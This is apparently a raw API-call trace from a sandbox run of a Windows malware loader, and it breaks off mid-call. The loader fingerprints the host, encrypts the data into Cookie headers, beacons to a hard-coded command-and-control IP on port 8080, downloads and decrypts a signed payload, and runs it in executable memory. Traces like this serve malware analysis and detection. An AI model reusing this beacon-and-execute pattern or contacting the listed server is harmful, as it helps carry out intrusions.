RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x5302b0 [0097.423] BCryptImportKeyPair (in: hAlgorithm=0x5320b0, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x5297f0, pbInput=0x530c50, cbInput=0x48, dwFlags=0x0 | out: phKey=0x5297f0) returned 0x0 [0097.423] GetProcessHeap () returned 0x500000 [0097.423] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5302b0 | out: hHeap=0x500000) returned 1 [0097.423] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5320b0, dwFlags=0x0 | out: hAlgorithm=0x5320b0) returned 0x0 [0097.424] GetProcessHeap () returned 0x500000 [0097.424] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x530c50 | out: hHeap=0x500000) returned 1 [0097.424] GetProcessHeap () returned 0x500000 [0097.424] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531830 | out: hHeap=0x500000) returned 1 [0097.424] GetProcessHeap () returned 0x500000 [0097.424] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x530930 [0097.424] GetProcessHeap () returned 0x500000 [0097.424] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x48) returned 0x531010 [0097.424] GetProcessHeap () returned 0x500000 [0097.424] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x48) returned 0x531740 [0097.424] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x200 [0097.425] WaitForSingleObject (hHandle=0x1fc, dwMilliseconds=0x51ed) returned 0x102 [0107.423] lstrlenA (lpString="XC64ZB_0C287F38") returned 15 [0107.424] RtlGetVersion (in: lpVersionInformation=0xce480 | out: lpVersionInformation=0xce480*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0107.426] GetNativeSystemInfo (in: lpSystemInfo=0xce450 | out: lpSystemInfo=0xce450*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507)) [0107.427] GetCurrentProcessId () returned 0xde0 [0107.427] ProcessIdToSessionId (in: dwProcessId=0xde0, pSessionId=0xce590 | out: pSessionId=0xce590) returned 1 [0107.428] GetProcessHeap () returned 0x500000 [0107.429] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2b) returned 0x518e10 [0107.432] GetProcessHeap () returned 0x500000 [0107.432] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10) returned 0x532010 [0107.432] GetProcessHeap () returned 0x500000 [0107.432] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x530e80 [0107.433] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xce1c8, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0xce1c8) returned 0x0 [0107.436] GetProcessHeap () returned 0x500000 [0107.436] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x532010 | out: hHeap=0x500000) returned 1 [0107.436] GetProcessHeap () returned 0x500000 [0107.437] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x530e80 | out: hHeap=0x500000) returned 1 [0107.437] GetProcessHeap () returned 0x500000 [0107.437] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x5301f0 [0107.437] BCryptGetProperty (in: hObject=0x532f40, pszProperty="ObjectLength", pbOutput=0xce1d8, cbOutput=0x4, pcbResult=0xce1e0, dwFlags=0x0 | out: pbOutput=0xce1d8, pcbResult=0xce1e0) returned 0x0 [0107.437] GetProcessHeap () returned 0x500000 [0107.437] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5301f0 | out: hHeap=0x500000) returned 1 [0107.437] GetProcessHeap () returned 0x500000 [0107.437] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x136) returned 0x522ba0 [0107.439] BCryptCreateHash (in: hAlgorithm=0x532f40, phHash=0xce1c0, pbHashObject=0x522ba0, cbHashObject=0x136, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x532f40, phHash=0xce1c0, pbHashObject=0x522ba0) returned 0x0 [0107.439] BCryptHashData (in: hHash=0x522ba0, pbInput=0x518e10, cbInput=0x2b, dwFlags=0x0 | out: hHash=0x522ba0) returned 0x0 [0107.439] BCryptFinishHash (in: hHash=0x522ba0, pbOutput=0xce2d8, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x522ba0, pbOutput=0xce2d8) returned 0x0 [0107.440] BCryptDestroyHash (in: hHash=0x522ba0 | out: hHash=0x522ba0) returned 0x0 [0107.440] GetProcessHeap () returned 0x500000 [0107.440] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x522ba0 | out: hHeap=0x500000) returned 1 [0107.440] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x532f40, dwFlags=0x0 | out: hAlgorithm=0x532f40) returned 0x0 [0107.441] GetProcessHeap () returned 0x500000 [0107.441] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x57) returned 0x522510 [0107.442] BCryptEncrypt (in: hKey=0x532ca0, pbInput=0x522510, cbInput=0x57, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0xce208, dwFlags=0x1 | out: hKey=0x532ca0, pbIV=0x0, pbOutput=0x0, pcbResult=0xce208) returned 0x0 [0107.443] GetProcessHeap () returned 0x500000 [0107.443] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x60) returned 0x532630 [0107.443] BCryptEncrypt (in: hKey=0x532ca0, pbInput=0x522510, cbInput=0x57, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x532630, cbOutput=0x60, pcbResult=0xce208, dwFlags=0x1 | out: hKey=0x532ca0, pbIV=0x0, pbOutput=0x532630, pcbResult=0xce208) returned 0x0 [0107.443] GetProcessHeap () returned 0x500000 [0107.443] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xe3) returned 0x522ba0 [0107.444] GetProcessHeap () returned 0x500000 [0107.444] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x532630 | out: hHeap=0x500000) returned 1 [0107.444] GetProcessHeap () returned 0x500000 [0107.444] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x522510 | out: hHeap=0x500000) returned 1 [0107.446] CryptBinaryToStringW (in: pbBinary=0x522ba0, cbBinary=0xe3, dwFlags=0x40000001, pszString=0x0, pcchString=0xce1fc | out: pszString=0x0, pcchString=0xce1fc) returned 1 [0107.447] GetProcessHeap () returned 0x500000 [0107.447] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x262) returned 0x532f40 [0107.447] CryptBinaryToStringW (in: pbBinary=0x522ba0, cbBinary=0xe3, dwFlags=0x40000001, pszString=0x532f40, pcchString=0xce1fc | out: pszString="wkhNt3DFOTN3rEnIf/FkiO3hjqhkeXjU8CLJFnCdq3eOvoQi0DsFfc7Z6gOgWKoE38IFIJ44aLG52/Sf3mrmM86YqBb+O8vYqCV2Ro0NGrop9GaLOdHvZEToTgzQqYcqUa+jytmurJP4FoQJ0bG1kztbgQrlWhKSNoiWJg9tNWamEgQaS2B6wckMieWEvzdro6QzEqnzB8ZrcN3VMajTzN0ARuH2Md3pw22roUjwINYvXdSmJT3QP7FrN+bmyWSXcT3ECKvDtbqjKjD/WSkvxyll1gvclvDNypgtxjqGqEDksIk=", pcchString=0xce1fc) returned 1 [0107.447] GetProcessHeap () returned 0x500000 [0107.447] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4000) returned 0x5331b0 [0107.449] GetProcessHeap () returned 0x500000 [0107.449] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x5307c0 [0107.450] _snwprintf (in: _Dest=0x5331b0, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: Sq=wkhNt3DFOTN3rEnIf/FkiO3hjqhkeXjU8CLJFnCdq3eOvoQi0DsFfc7Z6gOgWKoE38IFIJ44aLG52/Sf3mrmM86YqBb+O8vYqCV2Ro0NGrop9GaLOdHvZEToTgzQqYcqUa+jytmurJP4FoQJ0bG1kztbgQrlWhKSNoiWJg9tNWamEgQaS2B6wckMieWEvzdro6QzEqnzB8ZrcN3VMajTzN0ARuH2Md3pw22roUjwINYvXdSmJT3QP7FrN+bmyWSXcT3ECKvDtbqjKjD/WSkvxyll1gvclvDNypgtxjqGqEDksIk=\r\n") returned 317 [0107.450] GetProcessHeap () returned 0x500000 [0107.451] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5307c0 | out: hHeap=0x500000) returned 1 [0107.451] GetProcessHeap () returned 0x500000 [0107.451] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x532f40 | out: hHeap=0x500000) returned 1 [0107.451] GetProcessHeap () returned 0x500000 [0107.451] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x522ba0 | out: hHeap=0x500000) returned 1 [0107.453] GetProcessHeap () returned 0x500000 [0107.453] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x531e70 [0107.453] _snwprintf (in: _Dest=0xce400, _Count=0x40, _Format="%u.%u.%u.%u" | out: _Dest="104.168.155.143") returned 15 [0107.453] GetProcessHeap () returned 0x500000 [0107.453] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x531e70 | out: hHeap=0x500000) returned 1 [0107.456] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0108.424] GetProcessHeap () returned 0x500000 [0108.424] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x500000) returned 1 [0108.424] InternetConnectW (hInternet=0xcc0004, lpszServerName="104.168.155.143", nServerPort=0x1f90, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0108.425] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0108.429] GetProcessHeap () returned 0x500000 [0108.429] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x500000) returned 1 [0108.429] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0xce2e0*, dwBufferLength=0x4) returned 1 [0108.429] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xce2e0, lpdwBufferLength=0xce2e4 | out: lpBuffer=0xce2e0, lpdwBufferLength=0xce2e4) returned 0 [0108.430] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xce2e0*, dwBufferLength=0x4) returned 1 [0108.430] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: Sq=wkhNt3DFOTN3rEnIf/FkiO3hjqhkeXjU8CLJFnCdq3eOvoQi0DsFfc7Z6gOgWKoE38IFIJ44aLG52/Sf3mrmM86YqBb+O8vYqCV2Ro0NGrop9GaLOdHvZEToTgzQqYcqUa+jytmurJP4FoQJ0bG1kztbgQrlWhKSNoiWJg9tNWamEgQaS2B6wckMieWEvzdro6QzEqnzB8ZrcN3VMajTzN0ARuH2Md3pw22roUjwINYvXdSmJT3QP7FrN+bmyWSXcT3ECKvDtbqjKjD/WSkvxyll1gvclvDNypgtxjqGqEDksIk=\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0114.961] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0xce21c, lpdwBufferLength=0xce218, lpdwIndex=0x0 | out: lpBuffer=0xce21c*, lpdwBufferLength=0xce218*=0x4, lpdwIndex=0x0) returned 1 [0114.961] GetProcessHeap () returned 0x500000 [0114.961] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10000) returned 0x2464090 [0114.962] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2464090, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0xce1e8 | out: lpBuffer=0x2464090*, lpdwNumberOfBytesRead=0xce1e8*=0x3f4f) returned 1 [0114.963] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2467fdf, dwNumberOfBytesToRead=0xc0b1, lpdwNumberOfBytesRead=0xce1e8 | out: lpBuffer=0x2467fdf*, lpdwNumberOfBytesRead=0xce1e8*=0x3ff0) returned 1 [0114.964] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x246bfcf, dwNumberOfBytesToRead=0x80c1, lpdwNumberOfBytesRead=0xce1e8 | out: lpBuffer=0x246bfcf*, lpdwNumberOfBytesRead=0xce1e8*=0x3ff0) returned 1 [0114.964] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x246ffbf, dwNumberOfBytesToRead=0x40d1, lpdwNumberOfBytesRead=0xce1e8 | out: lpBuffer=0x246ffbf*, lpdwNumberOfBytesRead=0xce1e8*=0x3ff0) returned 1 [0114.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2473faf, dwNumberOfBytesToRead=0xe1, lpdwNumberOfBytesRead=0xce1e8 | out: lpBuffer=0x2473faf*, lpdwNumberOfBytesRead=0xce1e8*=0xd9) returned 1 [0114.965] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2474088, dwNumberOfBytesToRead=0x8, lpdwNumberOfBytesRead=0xce1e8 | out: lpBuffer=0x2474088*, lpdwNumberOfBytesRead=0xce1e8*=0x8) returned 1 [0114.965] GetProcessHeap () returned 0x500000 [0114.965] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20000) returned 0x254d260 [0114.966] GetProcessHeap () returned 0x500000 [0114.966] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2464090 | out: hHeap=0x500000) returned 1 [0114.966] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x255d260, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0xce1e8 | out: lpBuffer=0x255d260*, lpdwNumberOfBytesRead=0xce1e8*=0x3f07) returned 1 [0114.966] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2561167, dwNumberOfBytesToRead=0xc0f9, lpdwNumberOfBytesRead=0xce1e8 | out: lpBuffer=0x2561167*, lpdwNumberOfBytesRead=0xce1e8*=0x3ff0) returned 1 [0114.967] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2565157, dwNumberOfBytesToRead=0x8109, lpdwNumberOfBytesRead=0xce1e8 | out: lpBuffer=0x2565157*, lpdwNumberOfBytesRead=0xce1e8*=0x3ff8) returned 1 [0114.967] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x256914f, dwNumberOfBytesToRead=0x4111, lpdwNumberOfBytesRead=0xce1e8 | out: lpBuffer=0x256914f*, lpdwNumberOfBytesRead=0xce1e8*=0x3d17) returned 1 [0114.968] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x256ce66, dwNumberOfBytesToRead=0x3fa, lpdwNumberOfBytesRead=0xce1e8 | out: lpBuffer=0x256ce66*, lpdwNumberOfBytesRead=0xce1e8*=0x0) returned 1 [0114.968] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0114.968] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0114.968] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0114.968] GetProcessHeap () returned 0x500000 [0114.969] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5331b0 | out: hHeap=0x500000) returned 1 [0114.969] GetProcessHeap () returned 0x500000 [0114.969] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x500000) returned 1 [0114.969] BCryptDecrypt (in: hKey=0x532ca0, pbInput=0x254d260, cbInput=0x1fa70, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0xce268, dwFlags=0x1 | out: hKey=0x532ca0, pbIV=0x0, pbOutput=0x0, pcbResult=0xce268) returned 0x0 [0114.969] GetProcessHeap () returned 0x500000 [0114.969] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1fa70) returned 0x256d270 [0114.970] BCryptDecrypt (in: hKey=0x532ca0, pbInput=0x254d260, cbInput=0x1fa70, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x256d270, cbOutput=0x1fa70, pcbResult=0xce268, dwFlags=0x1 | out: hKey=0x532ca0, pbIV=0x0, pbOutput=0x256d270, pcbResult=0xce268) returned 0x0 [0114.970] GetProcessHeap () returned 0x500000 [0114.970] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10) returned 0x23eb350 [0114.970] GetProcessHeap () returned 0x500000 [0114.970] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x23f9f10 [0114.970] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xce168, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0xce168) returned 0x0 [0114.972] GetProcessHeap () returned 0x500000 [0114.972] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb350 | out: hHeap=0x500000) returned 1 [0114.972] GetProcessHeap () returned 0x500000 [0114.972] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f9f10 | out: hHeap=0x500000) returned 1 [0114.972] GetProcessHeap () returned 0x500000 [0114.972] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x2427820 [0114.972] BCryptGetProperty (in: hObject=0x574a60, pszProperty="ObjectLength", pbOutput=0xce178, cbOutput=0x4, pcbResult=0xce180, dwFlags=0x0 | out: pbOutput=0xce178, pcbResult=0xce180) returned 0x0 [0114.972] GetProcessHeap () returned 0x500000 [0114.972] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427820 | out: hHeap=0x500000) returned 1 [0114.972] GetProcessHeap () returned 0x500000 [0114.972] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x136) returned 0x573de0 [0114.972] BCryptCreateHash (in: hAlgorithm=0x574a60, phHash=0xce160, pbHashObject=0x573de0, cbHashObject=0x136, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x574a60, phHash=0xce160, pbHashObject=0x573de0) returned 0x0 [0114.972] BCryptHashData (in: hHash=0x573de0, pbInput=0x256d2b8, cbInput=0x1fa20, dwFlags=0x0 | out: hHash=0x573de0) returned 0x0 [0114.973] BCryptFinishHash (in: hHash=0x573de0, pbOutput=0xce248, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x573de0, pbOutput=0xce248) returned 0x0 [0114.973] BCryptDestroyHash (in: hHash=0x573de0 | out: hHash=0x573de0) returned 0x0 [0114.973] GetProcessHeap () returned 0x500000 [0114.973] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x573de0 | out: hHeap=0x500000) returned 1 [0114.973] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x574a60, dwFlags=0x0 | out: hAlgorithm=0x574a60) returned 0x0 [0114.973] BCryptVerifySignature (hKey=0x530610, pPaddingInfo=0x0, pbHash=0xce248, cbHash=0x20, pbSignature=0x256d274, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0114.986] GetProcessHeap () returned 0x500000 [0114.986] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1fa20) returned 0x258ccf0 [0114.987] GetProcessHeap () returned 0x500000 [0114.987] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x256d270 | out: hHeap=0x500000) returned 1 [0114.987] GetProcessHeap () returned 0x500000 [0114.987] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x254d260 | out: hHeap=0x500000) returned 1 [0114.990] GetProcessHeap () returned 0x500000 [0114.990] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x23f9f10 [0114.990] GetProcessHeap () returned 0x500000 [0114.990] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x23f9f60 [0114.991] VirtualAlloc (lpAddress=0x0, dwSize=0x23000, flAllocationType=0x3000, flProtect=0x40) returned 0x2660000 [0114.994] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1e5aff0, lpParameter=0x23f9f10, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a8 [0114.994] GetProcessHeap () returned 0x500000 [0114.994] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x258ccf0 | out: hHeap=0x500000) returned 1 [0114.996] GetProcessHeap () returned 0x500000 [0114.997] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x518e10 | out: hHeap=0x500000) returned 1 [0114.997] GetProcessHeap () returned 0x500000 [0114.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2f) returned 0x245e3a0 [0114.997] GetProcessHeap () returned 0x500000 [0114.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10) returned 0x23eb570 [0114.997] GetProcessHeap () returned 0x500000 [0114.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x23f9510 [0114.997] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xce1c8, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0xce1c8) returned 0x0 [0114.997] GetProcessHeap () returned 0x500000 [0114.997] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb570 | out: hHeap=0x500000) returned 1 [0114.997] GetProcessHeap () returned 0x500000 [0114.997] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f9510 | out: hHeap=0x500000) returned 1 [0114.997] GetProcessHeap () returned 0x500000 [0114.997] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x2427af0 [0114.997] BCryptGetProperty (in: hObject=0x574060, pszProperty="ObjectLength", pbOutput=0xce1d8, cbOutput=0x4, pcbResult=0xce1e0, dwFlags=0x0 | out: pbOutput=0xce1d8, pcbResult=0xce1e0) returned 0x0 [0114.997] GetProcessHeap () returned 0x500000 [0114.997] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2427af0 | out: hHeap=0x500000) returned 1 [0114.998] GetProcessHeap () returned 0x500000 [0114.998] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x136) returned 0x574a60 [0114.998] BCryptCreateHash (in: hAlgorithm=0x574060, phHash=0xce1c0, pbHashObject=0x574a60, cbHashObject=0x136, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x574060, phHash=0xce1c0, pbHashObject=0x574a60) returned 0x0 [0114.998] BCryptHashData (in: hHash=0x574a60, pbInput=0x245e3a0, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x574a60) returned 0x0 [0114.998] BCryptFinishHash (in: hHash=0x574a60, pbOutput=0xce2d8, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x574a60, pbOutput=0xce2d8) returned 0x0 [0114.998] BCryptDestroyHash (in: hHash=0x574a60 | out: hHash=0x574a60) returned 0x0 [0114.998] GetProcessHeap () returned 0x500000 [0114.998] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x574a60 | out: hHeap=0x500000) returned 1 [0114.998] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x574060, dwFlags=0x0 | out: hAlgorithm=0x574060) returned 0x0 [0114.998] GetProcessHeap () returned 0x500000 [0114.998] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x5b) returned 0x2497400 [0114.998] BCryptEncrypt (in: hKey=0x532ca0, pbInput=0x2497400, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0xce208, dwFlags=0x1 | out: hKey=0x532ca0, pbIV=0x0, pbOutput=0x0, pcbResult=0xce208) returned 0x0 [0114.998] GetProcessHeap () returned 0x500000 [0114.998] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x60) returned 0x2497320 [0114.998] BCryptEncrypt (in: hKey=0x532ca0, pbInput=0x2497400, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2497320, cbOutput=0x60, pcbResult=0xce208, dwFlags=0x1 | out: hKey=0x532ca0, pbIV=0x0, pbOutput=0x2497320, pcbResult=0xce208) returned 0x0 [0114.998] GetProcessHeap () returned 0x500000 [0114.998] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x11a) returned 0x23f52a0 [0114.998] GetProcessHeap () returned 0x500000 [0114.998] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2497320 | out: hHeap=0x500000) returned 1 [0114.998] GetProcessHeap () returned 0x500000 [0114.998] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2497400 | out: hHeap=0x500000) returned 1 [0114.998] CryptBinaryToStringW (in: pbBinary=0x23f52a0, cbBinary=0x11a, dwFlags=0x40000001, pszString=0x0, pcchString=0xce1fc | out: pszString=0x0, pcchString=0xce1fc) returned 1 [0114.998] GetProcessHeap () returned 0x500000 [0114.998] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2f2) returned 0x23e1c30 [0114.998] CryptBinaryToStringW (in: pbBinary=0x23f52a0, cbBinary=0x11a, dwFlags=0x40000001, pszString=0x23e1c30, pcchString=0xce1fc | out: pszString="wkhNt3DFOTN3rEnIf/FkiO3hjqhkeXjU8CLJFnCdq3eOvoQi0DsFfc7Z6gOgWKoE38IFIJ44aLG52/Sf3mrmMwhCBY5EjisrBmaXx4HtoKlbW1e6/c+RcOQFIPHqXIOcQ7vBkH/sgHZgCrg2DUiP/OSDOUsvJsmnKVS34Kir+5IJMzKlzzbofEojY+LQmqe/tm3CgzW0eF0Y2EiBjFAIgBUjewCx7zHS26yJSZuC1f2O1mVIaDJGglY+I6yqaM04r6fKAvoGRt+WPxZbR5wklDJjczSr5Uk4m5jJ8M4loYxkopYg3eGtKXC7qWRfxYqMTl2QkHErzs4qhWT6X4l5yBGOVGuVp+HHExej0mzcV95OstI99rSSJv0d", pcchString=0xce1fc) returned 1 [0114.998] GetProcessHeap () returned 0x500000 [0114.998] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4000) returned 0x24d44b0 [0114.999] GetProcessHeap () returned 0x500000 [0114.999] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x24277f0 [0114.999] _snwprintf (in: _Dest=0x24d44b0, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: WDt=wkhNt3DFOTN3rEnIf/FkiO3hjqhkeXjU8CLJFnCdq3eOvoQi0DsFfc7Z6gOgWKoE38IFIJ44aLG52/Sf3mrmMwhCBY5EjisrBmaXx4HtoKlbW1e6/c+RcOQFIPHqXIOcQ7vBkH/sgHZgCrg2DUiP/OSDOUsvJsmnKVS34Kir+5IJMzKlzzbofEojY+LQmqe/tm3CgzW0eF0Y2EiBjFAIgBUjewCx7zHS26yJSZuC1f2O1mVIaDJGglY+I6yqaM04r6fKAvoGRt+WPxZbR5wklDJjczSr5Uk4m5jJ8M4loYxkopYg3eGtKXC7qWRfxYqMTl2QkHErzs4qhWT6X4l5yBGOVGuVp+HHExej0mzcV95OstI99rSSJv0d\r\n") returned 390 [0114.999] GetProcessHeap () returned 0x500000 [0114.999] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24277f0 | out: hHeap=0x500000) returned 1 [0114.999] GetProcessHeap () returned 0x500000 [0114.999] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23e1c30 | out: hHeap=0x500000) returned 1 [0114.999] GetProcessHeap () returned 0x500000 [0114.999] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f52a0 | out: hHeap=0x500000) returned 1 [0114.999] GetProcessHeap () returned 0x500000 [0114.999] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x23eb790 [0114.999] _snwprintf (in: _Dest=0xce400, _Count=0x40, _Format="%u.%u.%u.%u" | out: _Dest="104.168.155.143") returned 15 [0114.999] GetProcessHeap () returned 0x500000 [0114.999] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb790 | out: hHeap=0x500000) returned 1 [0114.999] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0114.999] GetProcessHeap () returned 0x500000 [0114.999] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x500000) returned 1 [0115.000] InternetConnectW (hInternet=0xcc0004, 